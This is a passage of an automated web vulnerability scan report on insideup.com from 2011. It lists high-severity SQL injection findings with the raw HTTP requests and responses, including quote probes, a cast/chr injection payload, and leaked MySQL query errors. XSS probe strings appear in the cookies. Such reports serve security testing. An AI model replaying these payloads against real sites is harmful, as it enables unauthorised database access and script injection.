GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa'&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:30:21 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=7vk955uieovcapa3e1kd649bf6; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a'&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'code' OR prj.project_page_url = 'leadflow/incn00/project.php?catId=110006&iusrc=' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa''&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:30:22 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=h1kvvgkoc6a7ohh89th8pjssb0; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.420. http://www.insideup.com/ppc/leadflow/incn00/project.php [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project.php

Issue detail

The zip parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zip parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:30:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=rc5gvda62ubel6d07d1f72o8r2; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8318


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
committed or do not have lines currently&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=110006&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select chr(95' at line 5

Request 2

GET /ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc&address=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_458%5B%5D=2976__Internet+access&attributeId_459=2985__Yes+-+DSL&attributeId_460=2990__1&attributeId_461=2995__ASAP&attributeId_462_t=3&attributeId_490=3217__%2450+-+%24300+per+month+(price+for+Upgraded+Business+DSL)&attributeId_516=3357__+Unsure+-+please+advise&attributeId_517=3361__+No+-+we+are+not+committed+or+do+not+have+lines+currently&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=110006&website=n%2fa&zip=Zip+code'' HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:30:32 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=4nrd7ovmnuq177lbhheaoragj1; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.421. http://www.insideup.com/ppc/leadflow/incn00/project_dynamic_page_updated.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow'/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:36:18 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9vni5bdb9t47ch4ipoj4nah3b2; path=/
Content-Length: 2494
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
adflow'/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3' OR prj.project_page_url = 'leadflow'/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=110006&group=incn00&template=3' OR prj.project_page_url = 'leadflow'/incn' at line 5

Request 2

GET /ppc/leadflow''/incn00/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:36:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=k7cul1vae05ivlkummaejldt74; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow''/incn00/project_dynamic_page_updated.php was not found on this server.</p>

1.422. http://www.insideup.com/ppc/leadflow/incn00/project_dynamic_page_updated.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/incn00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/incn00'/project_dynamic_page_updated.php?catId=110006&group=incn00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/incn00/project.php?catId=110006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
